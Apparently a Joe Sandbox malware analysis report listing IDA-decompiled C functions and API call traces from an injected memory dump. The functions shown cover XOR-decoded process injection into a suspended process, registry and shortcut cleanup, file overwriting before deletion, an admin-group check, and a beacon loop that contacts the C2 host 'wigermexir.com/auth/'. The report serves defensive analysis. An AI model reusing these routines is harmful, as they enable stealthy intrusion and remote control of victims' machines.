      • Part of subcall function 00774EF0: ReadProcessMemory.KERNEL32(?,00000000,?,00001000,?), ref: 00774F69
      • Part of subcall function 00774EF0: ReadProcessMemory.KERNEL32(00000000,00000000,?,00000018,?), ref: 00774FBC
      • Part of subcall function 00774EF0: ReadProcessMemory.KERNEL32(00000000,00000000,?,00001000,?), ref: 00774FED
    • GetThreadContext.KERNEL32(?,00010007), ref: 00775209
    • CloseHandle.KERNEL32(?), ref: 007752C8
      • Part of subcall function 00774DE0: NtQueryInformationProcess.NTDLL(?,00000000,?,00000018,00000000), ref: 00774E09
      • Part of subcall function 00774DE0: ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 00774E39
      • Part of subcall function 00774DE0: ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 00774E5A
      • Part of subcall function 00774DE0: ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 00774E7E
    • VirtualProtectEx.KERNEL32(?,00000000,0000029B,00000040,?), ref: 00775252
    • WriteProcessMemory.KERNEL32(?,00000000,?,0000029B,?), ref: 0077526C
      • Part of subcall function 00771828: VirtualFree.KERNEL32(?,00000000,00008000,?,?,00776A2F), ref: 0077183A
    • ResumeThread.KERNEL32(?), ref: 0077527E
    • WaitForSingleObject.KERNEL32(?,00000000), ref: 00775292
    • GetExitCodeProcess.KERNEL32(?,?), ref: 007752A4
    • CloseHandle.KERNEL32(?), ref: 007752BE
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.16766566742.00770000.00000040.sdmp, Offset: 00770000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_770000_explorer.jbxd
    C-Code - Quality: 98%
    			E00775026(CHAR* _a4, struct HINSTANCE__* _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, long _a24) {
    				long _v8;
    				void* _v12;
    				void* _v16;
    				long _v20;
    				long _v24;
    				void* _v28;
    				signed int _v32;
    				long _v36;
    				long _v40;
    				char _v44;
    				struct _STARTUPINFOA _v112;
    				void* _v124;
    				struct _CONTEXT _v332;
    				char _v353;
    				signed int _t107;
    				void* _t144;
    
    				_v8 = 0xffffffff;
    				if(_a8 == 0) {
    					_a8 = GetModuleHandleA(0);
    				}
    				if(_a16 != 0 && _a20 == 0xffffffff) {
    					_a20 = E007712DC(_a16) + 1;
    				}
    				E00771258( &_v112, 0x44);
    				_v112.cb = 0x44;
    				_t107 = CreateProcessA(0, _a4, 0, 0, 0, 4, 0, 0,  &_v112,  &(_v332.ExtendedRegisters));
    				asm("sbb eax, eax");
    				_t109 =  ~( ~_t107);
    				if( ~( ~_t107) == 0) {
    					L23:
    					return _v8;
    				} else {
    					E00771164(E007710B4(_t109, 0x44),  &_v353);
    					E0077133C( &_v353, "_section");
    					_v24 =  *((intOrPtr*)( *((intOrPtr*)(_a8 + 0x3c)) + _a8 + 0x50));
    					_v12 = CreateFileMappingA(0xffffffff, 0, 4, 0, _v24 + 8 + _a20,  &_v353);
    					_v16 = MapViewOfFile(_v12, 0xf001f, 0, 0, 0);
    					E007712B8(_v16, _v24, _a8);
    					 *((intOrPtr*)(_v16 + _v24)) = _a12 - _a8;
    					 *((intOrPtr*)(_v16 + _v24 + 4)) = _a20;
    					E007712B8(_v16 + _v24 + 8, _a20, _a16);
    					_v24 = 0x29b;
    					E007713B4( &_v28, _v24 + 0x11);
    					E007712B8(_v28, _v24, 0x77a2ac);
    					_t144 = _v24 - 1;
    					if(_t144 < 0) {
    						L10:
    						_v20 = E007712DC( &_v353) + 1;
    						E007712B8(_v28 + _v24, _v20,  &_v353);
    						_v24 = _v24 + _v20;
    						_v40 = 0;
    						_v40 = E00774EF0(_v332.ExtendedRegisters.hProcess, _t229);
    						if(_v40 == 0) {
    							E00771258( &_v332, 0xcc);
    							_v332.ContextFlags = 0x10007;
    							if(GetThreadContext(_v124,  &_v332) != 0 && _v332.Eax != 0) {
    								_v40 = _v332.Eax;
    							}
    						}
    						_t233 = _v40;
    						if(_v40 == 0) {
    							_v40 = E00774DE0(_v332.ExtendedRegisters.hProcess, _t233);
    						}
    						if(_v40 != 0) {
    							VirtualProtectEx(_v332.ExtendedRegisters.hProcess, _v40, _v24, 0x40,  &_v36);
    							WriteProcessMemory(_v332.ExtendedRegisters.hProcess, _v40, _v28, _v24,  &_v20);
    							E00771828(_v28);
    							ResumeThread(_v124);
    							if(_a24 == 0) {
    								__eflags = 0;
    								_v8 = 0;
    							} else {
    								if(WaitForSingleObject(_v332.ExtendedRegisters.hProcess, _a24) != 0) {
    									_v8 = 0xfffffffe;
    								} else {
    									GetExitCodeProcess(_v332.ExtendedRegisters.hProcess,  &_v8);
    								}
    							}
    							CloseHandle(_v124);
    							CloseHandle(_v332.ExtendedRegisters);
    						}
    						goto L23;
    					}
    					_v44 = _t144 + 1;
    					_v32 = 0;
    					do {
    						 *(_v28 + _v32) =  *(_v28 + _v32) ^ 0x000000e4 + _v32 * 0xffffff9b;
    						_v32 = _v32 + 1;
    						_t55 =  &_v44;
    						 *_t55 = _v44 - 1;
    						_t229 =  *_t55;
    					} while ( *_t55 != 0);
    					goto L10;
    				}
    			}

    APIs
    • GetModuleHandleA.KERNEL32(00000000), ref: 00775040
    • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 0077508F
    • CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,?,?), ref: 007750F5
    • MapViewOfFile.KERNEL32(?,000F001F,00000000,00000000,00000000), ref: 0077510D
      • Part of subcall function 007713B4: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 007713CD
      • Part of subcall function 00774EF0: ReadProcessMemory.KERNEL32(?,00000000,?,00001000,?), ref: 00774F3A
      • Part of subcall function 00774EF0: ReadProcessMemory.KERNEL32(?,00000000,?,00001000,?), ref: 00774F69
      • Part of subcall function 00774EF0: ReadProcessMemory.KERNEL32(00000000,00000000,?,00000018,?), ref: 00774FBC
      • Part of subcall function 00774EF0: ReadProcessMemory.KERNEL32(00000000,00000000,?,00001000,?), ref: 00774FED
    • GetThreadContext.KERNEL32(?,00010007), ref: 00775209
    • CloseHandle.KERNEL32(?), ref: 007752C8
      • Part of subcall function 00774DE0: NtQueryInformationProcess.NTDLL(?,00000000,?,00000018,00000000), ref: 00774E09
      • Part of subcall function 00774DE0: ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 00774E39
      • Part of subcall function 00774DE0: ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 00774E5A
      • Part of subcall function 00774DE0: ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 00774E7E
    • VirtualProtectEx.KERNEL32(?,00000000,0000029B,00000040,?), ref: 00775252
    • WriteProcessMemory.KERNEL32(?,00000000,?,0000029B,?), ref: 0077526C
      • Part of subcall function 00771828: VirtualFree.KERNEL32(?,00000000,00008000,?,?,00776A2F), ref: 0077183A
    • ResumeThread.KERNEL32(?), ref: 0077527E
    • WaitForSingleObject.KERNEL32(?,00000000), ref: 00775292
    • GetExitCodeProcess.KERNEL32(?,?), ref: 007752A4
    • CloseHandle.KERNEL32(?), ref: 007752BE
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.16766566742.00770000.00000040.sdmp, Offset: 00770000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_770000_explorer.jbxd
    C-Code - Quality: 90%
    			E007780C0(intOrPtr __eax) {
    				intOrPtr _v8;
    				char _v265;
    				void* _t13;
    				void* _t15;
    				char* _t27;
    				intOrPtr _t31;
    				void* _t33;
    				void* _t35;
    				signed int _t37;
    				signed int _t39;
    				char* _t42;
    				struct HWND__* _t48;
    				intOrPtr _t50;
    				char* _t60;
    				char* _t62;
    				void* _t63;
    
    				_v8 = __eax;
    				if( *0x77a038 != 0) {
    					_t50 =  *0x77a038; // 0x0
    					 *0x77b4f8(_t50);
    				}
    				 *0x77c24c = CreateEventA(0, 0xffffffff, 0, 0);
    				 *0x77a29c = 0xffffffff;
    				_t13 =  *0x77c24c; // 0x0
    				WaitForSingleObject(_t13, 0xffffffff);
    				_t15 =  *0x77c24c; // 0x0
    				CloseHandle(_t15);
    				E00771308( &_v265, 0x77b518);
    				 *((char*)(_t63 + E007712DC(0x77b518) - 0x109)) = 0;
    				E0077133C( &_v265, ".lnk");
    				E0077471C( &_v265, 0, 0);
    				E0077471C(0x77b518, 0x7530, 0xffffffff);
    				if( *0x77a574 != 0) {
    					_t48 =  *0x77a574; // 0x6024a
    					SendMessageA(_t48, 0x10, 0, 0);
    				}
    				if( *0x77a034 == 0) {
    					if(_v8 == 0) {
    						_t27 =  *0x77a260; // 0x7721a4
    						SHDeleteKeyA(0x80000001, _t27);
    					} else {
    						_t60 =  *0x77a260; // 0x7721a4
    						E00778064(0x80000001, 0x77b752, _t60);
    					}
    					E00774A1C(0x80000001,  &_v265);
    				} else {
    					if(_v8 == 0) {
    						_t42 =  *0x77a260; // 0x7721a4
    						SHDeleteKeyA(0x80000002, _t42);
    					} else {
    						_t62 =  *0x77a260; // 0x7721a4
    						E00778064(0x80000002, 0x77b752, _t62);
    					}
    					E00774A1C(0x80000002,  &_v265);
    				}
    				_t31 =  *0x77b510; // 0x790000
    				E00771828(_t31);
    				_t33 =  *0x77a054; // 0x230
    				ReleaseMutex(_t33);
    				_t35 =  *0x77a054; // 0x230
    				CloseHandle(_t35);
    				_t37 =  *0x77a2a0; // 0x0
    				asm("sbb eax, eax");
    				_t39 =  ~( ~_t37);
    				if(_t39 == 0) {
    					ExitProcess(0);
    				}
    				return _t39;
    			}

    APIs
    • RtlRemoveVectoredExceptionHandler.NTDLL(00000000), ref: 007780DB
    • CreateEventA.KERNEL32(00000000,000000FF,00000000,00000000), ref: 007780E9
    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00778106
    • CloseHandle.KERNEL32(00000000), ref: 00778112
      • Part of subcall function 0077471C: CreateThread.KERNEL32(00000000,00000000,Function_00004608,?,00000000,?), ref: 00774777
      • Part of subcall function 0077471C: SetThreadPriority.KERNEL32(?,000000F1), ref: 00774786
      • Part of subcall function 0077471C: CloseHandle.KERNEL32(?), ref: 00774790
    • SendMessageA.USER32(0006024A,00000010,00000000,00000000), ref: 00778184
    • SHDeleteKeyA.SHLWAPI(80000002,007721A4), ref: 007781BB
    • ExitProcess.KERNEL32 ref: 00778244
      • Part of subcall function 00778064: RegOpenKeyExA.KERNELBASE(?,?,00000000,000F003F,?), ref: 0077808B
      • Part of subcall function 00778064: RegDeleteValueA.ADVAPI32(?,?), ref: 0077809D
    • SHDeleteKeyA.SHLWAPI(80000001,007721A4), ref: 007781FB
      • Part of subcall function 00774A1C: RegDeleteValueA.ADVAPI32(?,?), ref: 00774A55
      • Part of subcall function 00771828: VirtualFree.KERNEL32(?,00000000,00008000,?,?,00776A2F), ref: 0077183A
    • ReleaseMutex.KERNEL32(00000230), ref: 00778221
    • CloseHandle.KERNEL32(00000230), ref: 0077822D
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.16766566742.00770000.00000040.sdmp, Offset: 00770000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_770000_explorer.jbxd
    C-Code - Quality: 90%
    			E007780BE(intOrPtr __eax) {
    				intOrPtr _v8;
    				char _v265;
    				void* _t13;
    				void* _t15;
    				char* _t27;
    				intOrPtr _t31;
    				void* _t33;
    				void* _t35;
    				signed int _t37;
    				signed int _t39;
    				char* _t42;
    				struct HWND__* _t48;
    				intOrPtr _t50;
    				char* _t60;
    				char* _t62;
    				void* _t64;
    				void* _t66;
    
    				_t64 = _t66;
    				_v8 = __eax;
    				if( *0x77a038 != 0) {
    					_t50 =  *0x77a038; // 0x0
    					 *0x77b4f8(_t50);
    				}
    				 *0x77c24c = CreateEventA(0, 0xffffffff, 0, 0);
    				 *0x77a29c = 0xffffffff;
    				_t13 =  *0x77c24c; // 0x0
    				WaitForSingleObject(_t13, 0xffffffff);
    				_t15 =  *0x77c24c; // 0x0
    				CloseHandle(_t15);
    				E00771308( &_v265, 0x77b518);
    				 *((char*)(_t64 + E007712DC(0x77b518) - 0x109)) = 0;
    				E0077133C( &_v265, ".lnk");
    				E0077471C( &_v265, 0, 0);
    				E0077471C(0x77b518, 0x7530, 0xffffffff);
    				if( *0x77a574 != 0) {
    					_t48 =  *0x77a574; // 0x6024a
    					SendMessageA(_t48, 0x10, 0, 0);
    				}
    				if( *0x77a034 == 0) {
    					if(_v8 == 0) {
    						_t27 =  *0x77a260; // 0x7721a4
    						SHDeleteKeyA(0x80000001, _t27);
    					} else {
    						_t60 =  *0x77a260; // 0x7721a4
    						E00778064(0x80000001, 0x77b752, _t60);
    					}
    					E00774A1C(0x80000001,  &_v265);
    				} else {
    					if(_v8 == 0) {
    						_t42 =  *0x77a260; // 0x7721a4
    						SHDeleteKeyA(0x80000002, _t42);
    					} else {
    						_t62 =  *0x77a260; // 0x7721a4
    						E00778064(0x80000002, 0x77b752, _t62);
    					}
    					E00774A1C(0x80000002,  &_v265);
    				}
    				_t31 =  *0x77b510; // 0x790000
    				E00771828(_t31);
    				_t33 =  *0x77a054; // 0x230
    				ReleaseMutex(_t33);
    				_t35 =  *0x77a054; // 0x230
    				CloseHandle(_t35);
    				_t37 =  *0x77a2a0; // 0x0
    				asm("sbb eax, eax");
    				_t39 =  ~( ~_t37);
    				if(_t39 == 0) {
    					ExitProcess(0);
    				}
    				return _t39;
    			}

    APIs
    • RtlRemoveVectoredExceptionHandler.NTDLL(00000000), ref: 007780DB
    • CreateEventA.KERNEL32(00000000,000000FF,00000000,00000000), ref: 007780E9
    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00778106
    • CloseHandle.KERNEL32(00000000), ref: 00778112
      • Part of subcall function 0077471C: CreateThread.KERNEL32(00000000,00000000,Function_00004608,?,00000000,?), ref: 00774777
      • Part of subcall function 0077471C: SetThreadPriority.KERNEL32(?,000000F1), ref: 00774786
      • Part of subcall function 0077471C: CloseHandle.KERNEL32(?), ref: 00774790
    • SendMessageA.USER32(0006024A,00000010,00000000,00000000), ref: 00778184
    • ExitProcess.KERNEL32 ref: 00778244
      • Part of subcall function 00778064: RegOpenKeyExA.KERNELBASE(?,?,00000000,000F003F,?), ref: 0077808B
      • Part of subcall function 00778064: RegDeleteValueA.ADVAPI32(?,?), ref: 0077809D
    • SHDeleteKeyA.SHLWAPI(80000002,007721A4), ref: 007781BB
    • SHDeleteKeyA.SHLWAPI(80000001,007721A4), ref: 007781FB
      • Part of subcall function 00774A1C: RegDeleteValueA.ADVAPI32(?,?), ref: 00774A55
      • Part of subcall function 00771828: VirtualFree.KERNEL32(?,00000000,00008000,?,?,00776A2F), ref: 0077183A
    • ReleaseMutex.KERNEL32(00000230), ref: 00778221
    • CloseHandle.KERNEL32(00000230), ref: 0077822D
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.16766566742.00770000.00000040.sdmp, Offset: 00770000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_770000_explorer.jbxd
    C-Code - Quality: 96%
    			E00774608(intOrPtr* _a4) {
    				int _v8;
    				CHAR* _v12;
    				long _v16;
    				void* _v20;
    				long _v24;
    				intOrPtr _v28;
    				long _v32;
    				char _v36;
    				void _v548;
    				signed int _t42;
    				char _t58;
    
    				_v8 = 0;
    				_v16 =  *_a4;
    				_v12 = _a4 + 4;
    				while(1) {
    					_t42 = E00773988(_v12);
    					asm("sbb eax, eax");
    					if( ~( ~_t42) == 0) {
    						break;
    					}
    					_v20 = CreateFileA(_v12, 0xc0000000, 0, 0, 3, 0x20000080, 0);
    					if(_v20 == 0xffffffff) {
    						L8:
    						_v8 = DeleteFileA(_v12);
    						if(_v8 != 0 || _v16 == 0) {
    							L13:
    							E00771440(_a4);
    							return _v8;
    						} else {
    							if(_v16 <= 0x64) {
    								Sleep(_v16);
    								_v16 = 0;
    							} else {
    								Sleep(0x64);
    								_v16 = _v16 - 0x64;
    							}
    							continue;
    						}
    					}
    					_v24 = GetFileSize(_v20, 0);
    					_t58 = (_v24 >> 9) + 1;
    					if(_t58 <= 0) {
    						L7:
    						FlushFileBuffers(_v20);
    						CloseHandle(_v20);
    						goto L8;
    					}
    					_v36 = _t58;
    					_v28 = 1;
    					do {
    						WriteFile(_v20,  &_v548, 0x200,  &_v32, 0);
    						_v28 = _v28 + 1;
    						_t21 =  &_v36;
    						 *_t21 = _v36 - 1;
    					} while ( *_t21 != 0);
    					goto L7;
    				}
    				_v8 = 0xffffffff;
    				goto L13;
    			}

    APIs
      • Part of subcall function 00773988: FindFirstFileA.KERNEL32(?,?), ref: 007739A4
      • Part of subcall function 00773988: FindClose.KERNEL32(000000FF), ref: 007739BF
    • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000003,20000080,00000000), ref: 0077465B
    • GetFileSize.KERNEL32(000000FF,00000000), ref: 00774670
    • WriteFile.KERNEL32(000000FF,?,00000200,?,00000000), ref: 007746A4
    • FlushFileBuffers.KERNEL32(000000FF), ref: 007746B6
    • CloseHandle.KERNEL32(000000FF), ref: 007746C0
    • DeleteFileA.KERNEL32(?), ref: 007746CA
    • Sleep.KERNEL32(00000064), ref: 007746E7
    • Sleep.KERNEL32(00000064), ref: 007746FA
      • Part of subcall function 00771440: GetProcessHeap.KERNEL32(00000000,?), ref: 0077144D
      • Part of subcall function 00771440: HeapFree.KERNEL32(00000000), ref: 00771454
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.16766566742.00770000.00000040.sdmp, Offset: 00770000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_770000_explorer.jbxd
    C-Code - Quality: 100%
    			E007741CC() {
    				char _v5;
    				void* _v12;
    				void* _v16;
    				long _v20;
    				void* _v24;
    				signed int _v28;
    				int _v32;
    				char _v36;
    				void* _t51;
    
    				_v5 = 0;
    				_v32 = OpenThreadToken(GetCurrentThread(), 8, 0xffffffff,  &_v12);
    				if(_v32 == 0 && GetLastError() == 0x3f0) {
    					_v32 = OpenProcessToken(GetCurrentProcess(), 8,  &_v12);
    				}
    				if(_v32 != 0) {
    					_v16 = E007713DC(0x400);
    					_v32 = GetTokenInformation(_v12, 2, _v16, 0x400,  &_v20);
    					CloseHandle(_v12);
    					if(_v32 != 0) {
    						AllocateAndInitializeSid(0x77a2a4, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v24);
    						_t51 =  *_v16 - 1;
    						if(_t51 >= 0) {
    							_v36 = _t51 + 1;
    							_v28 = 0;
    							while(EqualSid(_v24,  *(_v16 + 4 + _v28 * 8)) == 0) {
    								_v28 = _v28 + 1;
    								_t28 =  &_v36;
    								 *_t28 = _v36 - 1;
    								if( *_t28 != 0) {
    									continue;
    								}
    								goto L10;
    							}
    							_v5 = 1;
    						}
    						L10:
    						FreeSid(_v24);
    					}
    					E00771440(_v16);
    				}
    				return _v5;
    			}

    APIs
    • GetCurrentThread.KERNEL32 ref: 007741DE
    • OpenThreadToken.ADVAPI32(00000000), ref: 007741E5
    • GetLastError.KERNEL32 ref: 007741F4
    • GetCurrentProcess.KERNEL32 ref: 00774207
    • OpenProcessToken.ADVAPI32(00000000), ref: 0077420E
      • Part of subcall function 007713DC: GetProcessHeap.KERNEL32(00000000,?), ref: 007713EB
      • Part of subcall function 007713DC: RtlAllocateHeap.NTDLL(00000000), ref: 007713F2
    • GetTokenInformation.ADVAPI32(?,00000002,?,00000400,?), ref: 00774241
    • CloseHandle.KERNEL32(?), ref: 0077424E
    • AllocateAndInitializeSid.ADVAPI32(0077A2A4,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00774278
    • EqualSid.ADVAPI32(?,?), ref: 007742A2
    • FreeSid.ADVAPI32(?), ref: 007742BE
      • Part of subcall function 00771440: GetProcessHeap.KERNEL32(00000000,?), ref: 0077144D
      • Part of subcall function 00771440: HeapFree.KERNEL32(00000000), ref: 00771454
    Memory Dump Source
    • Source File: 00000001.00000002.16766566742.00770000.00000040.sdmp, Offset: 00770000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_770000_explorer.jbxd
    C-Code - Quality: 100%
    			E007741C8(intOrPtr* __eax) {
    				char _v5;
    				void* _v12;
    				void* _v16;
    				long _v20;
    				void* _v24;
    				signed int _v28;
    				int _v32;
    				char _v36;
    				void* _t52;
    
    				 *__eax =  *__eax + __eax;
    				_v5 = 0;
    				_v32 = OpenThreadToken(GetCurrentThread(), 8, 0xffffffff,  &_v12);
    				if(_v32 == 0 && GetLastError() == 0x3f0) {
    					_v32 = OpenProcessToken(GetCurrentProcess(), 8,  &_v12);
    				}
    				if(_v32 != 0) {
    					_v16 = E007713DC(0x400);
    					_v32 = GetTokenInformation(_v12, 2, _v16, 0x400,  &_v20);
    					CloseHandle(_v12);
    					if(_v32 != 0) {
    						AllocateAndInitializeSid(0x77a2a4, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v24);
    						_t52 =  *_v16 - 1;
    						if(_t52 >= 0) {
    							_v36 = _t52 + 1;
    							_v28 = 0;
    							while(EqualSid(_v24,  *(_v16 + 4 + _v28 * 8)) == 0) {
    								_v28 = _v28 + 1;
    								_t28 =  &_v36;
    								 *_t28 = _v36 - 1;
    								if( *_t28 != 0) {
    									continue;
    								}
    								goto L11;
    							}
    							_v5 = 1;
    						}
    						L11:
    						FreeSid(_v24);
    					}
    					E00771440(_v16);
    				}
    				return _v5;
    			}

    APIs
    • GetCurrentThread.KERNEL32 ref: 007741DE
    • OpenThreadToken.ADVAPI32(00000000), ref: 007741E5
    • GetLastError.KERNEL32 ref: 007741F4
    • GetCurrentProcess.KERNEL32 ref: 00774207
    • OpenProcessToken.ADVAPI32(00000000), ref: 0077420E
      • Part of subcall function 007713DC: GetProcessHeap.KERNEL32(00000000,?), ref: 007713EB
      • Part of subcall function 007713DC: RtlAllocateHeap.NTDLL(00000000), ref: 007713F2
    • GetTokenInformation.ADVAPI32(?,00000002,?,00000400,?), ref: 00774241
    • CloseHandle.KERNEL32(?), ref: 0077424E
    • AllocateAndInitializeSid.ADVAPI32(0077A2A4,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00774278
    • EqualSid.ADVAPI32(?,?), ref: 007742A2
    • FreeSid.ADVAPI32(?), ref: 007742BE
      • Part of subcall function 00771440: GetProcessHeap.KERNEL32(00000000,?), ref: 0077144D
      • Part of subcall function 00771440: HeapFree.KERNEL32(00000000), ref: 00771454
    Memory Dump Source
    • Source File: 00000001.00000002.16766566742.00770000.00000040.sdmp, Offset: 00770000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_770000_explorer.jbxd
    C-Code - Quality: 98%
    			E007784A4() {
    				intOrPtr _v8;
    				intOrPtr _v12;
    				void* _v16;
    				char _v20;
    				intOrPtr* _v24;
    				intOrPtr _v28;
    				intOrPtr _v32;
    				intOrPtr _v36;
    				intOrPtr _v40;
    				long _v44;
    				intOrPtr _v48;
    				intOrPtr _v52;
    				intOrPtr _v56;
    				intOrPtr _v60;
    				intOrPtr _v64;
    				intOrPtr _v68;
    				char _v156;
    				char _v4253;
    				char _v4382;
    				char _v4424;
    				char _v4428;
    				intOrPtr _t119;
    				intOrPtr _t131;
    				intOrPtr _t135;
    				intOrPtr _t140;
    				intOrPtr _t144;
    				intOrPtr _t149;
    				intOrPtr _t152;
    				intOrPtr _t157;
    				intOrPtr _t165;
    				intOrPtr _t170;
    				intOrPtr _t174;
    				intOrPtr _t179;
    				intOrPtr _t187;
    				void* _t195;
    				intOrPtr _t198;
    				signed int _t199;
    				char _t202;
    				intOrPtr _t205;
    				signed int _t208;
    				intOrPtr _t220;
    				intOrPtr _t228;
    				char _t236;
    				intOrPtr _t269;
    				char _t276;
    				intOrPtr _t279;
    				intOrPtr _t283;
    				intOrPtr _t289;
    				intOrPtr* _t290;
    				intOrPtr _t291;
    				intOrPtr _t292;
    				void* _t300;
    				void* _t301;
    				void* _t317;
    
    				_v68 = _t119;
    				_v40 = E007713DC(0x20000);
    				_v60 = 0;
    				_v64 = 0;
    				_v4382 = 0;
    				if( *0x77b77c == 0) {
    					_t276 =  *0x77c355; // 0x0
    					_v4428 = _t276;
    					E00771308( &_v4424, 0x77c384);
    					while(1) {
    						_t281 =  &_v4428;
    						_t279 =  *0x77a194; // 0x771e9c
    						_v12 = E00775AE8(_t279,  &_v4428, 0);
    						if(_v12 != 0) {
    							goto L4;
    						}
    						Sleep(0x4e20);
    					}
    					while(1) {
    						L4:
    						_v48 = 0;
    						E007764BC( &_v156, 0x32, __eflags);
    						_t283 =  *0x77a198; // 0x771eac
    						E00771308(_v40, _t283);
    						E0077133C(_v40, "1530474054");
    						_t131 =  *0x77a19c; // 0x771eb4
    						E0077133C(_v40, _t131);
    						_t135 =  *0x77b77c; // 0x0
    						E00771864(_t135,  &_v4253);
    						E0077133C(_v40,  &_v4253);
    						_t140 =  *0x77a0bc; // 0x771c84
    						E0077133C(_v40, _t140);
    						_t144 =  *0x77c380; // 0x0
    						E00771864(_t144,  &_v4253);
    						E0077133C(_v40,  &_v4253);
    						_t149 =  *0x77a0c0; // 0x771c8c
    						E0077133C(_v40, _t149);
    						_t152 =  *0x77c37c; // 0x0
    						E00771164(_t152,  &_v4253);
    						E0077133C(_v40,  &_v4253);
    						_t157 =  *0x77a0b4; // 0x771c70
    						E0077133C(_v40, _t157);
    						E00778258( &_v4253);
    						E0077133C(_v40,  &_v4253);
    						_t165 =  *0x77a0b8; // 0x771c78
    						E0077133C(_v40, _t165);
    						E0077133C(_v40, 0x778984);
    						_t170 =  *0x77a0c4; // 0x771c94
    						E0077133C(_v40, _t170);
    						_t174 =  *0x77c355; // 0x0
    						E00771864(_t174,  &_v4253);
    						E0077133C(_v40,  &_v4253);
    						_t317 = _t301 + 0x80;
    						__eflags = _v4382;
    						if(_v4382 != 0) {
    							E0077133C(_v40,  &_v4382);
    							_t317 = _t317 + 8;
    						}
    						_t179 =  *0x77a1bc; // 0x771ef8
    						E0077133C(_v40, _t179);
    						E00774154( &_v4253);
    						E0077133C(_v40,  &_v4253);
    						_t187 =  *0x77a0c8; // 0x771c9c
    						E0077133C(_v40, _t187);
    						_t301 = _t317 + 0x18;
    						_v8 = 0;
    						_v44 = GetTickCount();
    						__eflags = _v44 - 0x3a98;
    						if(_v44 < 0x3a98) {
    							__eflags = 0x3a98;
    							Sleep(0x3a98 - _v44);
    						}
    						_t195 = E007712DC(_v40);
    						_t198 =  *0x77c230; // 0x7723ae
    						_t199 =  *0x77b784; // 0xd4
    						_v12 = E00775D20(_t281, _t199 &  *0x77a074, _t198,  &_v156, "wigermexir.com/auth/", 0x77c355, _v40, _t195,  &_v16,  &_v20);
    						__eflags = _v12;
    						if(_v12 == 0) {
    							break;
    						}
    						_t289 =  *0x77a240; // 0x7720a8
    						_v36 = E00771110(_v16, _t289);
    						_v24 = _v16;
    						_t220 =  *0x77c355; // 0x0
    						 *0x77b64d = _t220;
    						 *0x77b780 = E00775468();
    						E00777474(0x77b61c, __eflags);
    						_t290 =  *0x77a1a8; // 0x771ecc
    						__eflags =  *_v24 -  *_t290;
    						if( *_v24 ==  *_t290) {
    							L21:
    							E00771440(_v16);
    							do {
    								_v48 = _v48 + 1;
    								Sleep(0x3e8);
    								_v52 = _v52 + 1;
    								_t228 =  *0x77b715; // 0x12c
    								__eflags = _t228 - _v48;
    							} while (__eflags > 0);
    							continue;
    						}
    						_v56 = 0;
    						_v28 = 0;
    						_t291 =  *0x77a190; // 0x771e8c
    						_v28 = E00771110(_v24, _t291);
    						__eflags = _v28;
    						if(_v28 == 0) {
    							_t292 =  *0x77a18c; // 0x771e7c
    							_v28 = E00771110(_v24, _t292);
    						} else {
    							_v56 = 0xffffffff;
    						}
    						__eflags = _v28;
    						if(_v28 != 0) {
    							_v44 = _v28 - _v24;
    							_v28 = _v28 + 0xd;
    							_v36 = E00771110(_v28, E00778988);
    							_v32 = _v36 - _v28;
    							_t281 = _v32;
    							E007712B8( &_v4253, _v32, _v28);
    							 *((char*)(_t300 + _v32 - 0x1099)) = 0;
    							_v32 = E007710E0( &_v4253, _v28);
    							_t269 = _v36 + 2;
    							__eflags = _t269;
    							_v28 = _t269;
    							 *((char*)(_v24 + _v44)) = 0;
    						}
    						__eflags = _v56;
    						if(__eflags == 0) {
    							L19:
    							_t236 = E00777F20(_v24, _t281, 4);
    							__eflags = _t236;
    							if(_t236 != 0) {
    								E007780C0(_v56);
    								E00771440(_v40);
    								E00771440(_v16);
    								_push(0);
    								RtlExitUserThread();
    							}
    							goto L21;
    						} else {
    							_t281 = _v32;
    							__eflags = E007782F8(_v24, _v32, _v28, __eflags);
    							if(__eflags == 0) {
    								E00771440(_v16);
    								continue;
    							}
    							E007780C0(_v56);
    							E00771440(_v40);
    							E00771440(_v16);
    							_push(0);
    							RtlExitUserThread();
    							goto L19;
    						}
    					}
    					_t202 =  *0x77c355; // 0x0
    					_v4428 = _t202;
    					E00771308( &_v4424, 0x77c384);
    					_t205 =  *0x77b651; // 0x5b3bfa2c
    					_t208 =  *0x77b784; // 0xd4
    					_t281 =  *0x77b780; // 0x5b3bfa2c
    					__eflags = E0077660C(_t208 &  *0x77a074, _t281, 0x77b625, __eflags, 0x77ba00,  &_v4428,  &_v4253, _t205);
    					if(__eflags != 0) {
    						E00771308(0x77b625,  &_v4253);
    						E00771308(0x77c254,  &_v4253);
    					}
    					 *0x77c355 = _v4428;
    					 *0x77b64d = _v4428;
    				}
    			}

    0x007784b4
    0x007784c1
    0x007784c6
    0x007784cb
    0x007784ce
    0x007784dc
    0x007784de
    0x007784e3
